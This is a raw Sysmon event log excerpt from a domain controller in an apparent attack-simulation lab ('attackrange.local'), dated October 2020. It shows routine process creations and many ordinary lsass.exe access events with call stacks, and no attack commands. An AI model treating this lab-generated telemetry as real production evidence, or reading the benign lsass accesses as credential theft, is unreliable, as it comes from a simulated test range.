08:41:21.910{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2F00-000000007F01}2892C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001125Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.906{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001124Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.905{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001123Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.905{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001122Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.905{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001121Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.904{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169E-5F84-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001120Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.904{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169E-5F84-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001119Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.903{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16A2-5F84-2100-000000007F01}2444C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001118Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.903{5D479F2C-169F-5F84-0A00-000000007F01}8561132C:\Windows\system32\services.exe{5D479F2C-16A2-5F84-2100-000000007F01}2444C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001117Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.894{5D479F2C-16B1-5F84-2E00-000000007F01}2444C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001116Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.903{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-2F00-000000007F01}2892C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001115Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.902{5D479F2C-169F-5F84-0A00-000000007F01}8562600C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2F00-000000007F01}2892C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001114Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.901{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-2A00-000000007F01}2900C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001113Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.901{5D479F2C-169F-5F84-0A00-000000007F01}8561128C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2A00-000000007F01}2900C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001112Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.893{5D479F2C-16B1-5F84-2A00-000000007F01}2900C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.0Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F8D0C92070E59A059A889D5E269C0DA9,SHA256=D40478A82BB2993F39A3ED6066CD0599BE37FF9A0898636A680926FE145C64D6,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001111Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.900{5D479F2C-169F-5F84-0B00-000000007F01}864912C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001110Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.900{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001109Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.900{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001108Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.900{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001107Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.900{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001106Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.899{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001105Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.899{5D479F2C-169F-5F84-0B00-000000007F01}864912C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001104Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.899{5D479F2C-169F-5F84-0A00-000000007F01}856944C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2B00-000000007F01}2904C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001103Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.895{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-2B00-000000007F01}2904C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001102Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.894{5D479F2C-169F-5F84-0A00-000000007F01}856952C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2B00-000000007F01}2904C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001101Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.893{5D479F2C-16B1-5F84-2B00-000000007F01}2904C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001100Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.893{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-2900-000000007F01}2920C:\Program Files (x86)\nxlog\nxlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001099Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.893{5D479F2C-169F-5F84-0A00-000000007F01}8561192C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2900-000000007F01}2920C:\Program Files (x86)\nxlog\nxlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001098Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.891{5D479F2C-16B1-5F84-2900-000000007F01}2920C:\Program Files (x86)\nxlog\nxlog.exe-----"C:\Program Files (x86)\nxlog\nxlog.exe" -c "C:\Program Files (x86)\nxlog\conf\nxlog.conf"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=EDE0FA11A10EF649A05AC992D0231673,SHA256=B66FA8592904D8502747C78C79D5B3E86C9ED7383A8159209BB2740BB92070EC,IMPHASH=517158273EC1C6D5E65120E91DD2284A{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001097Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 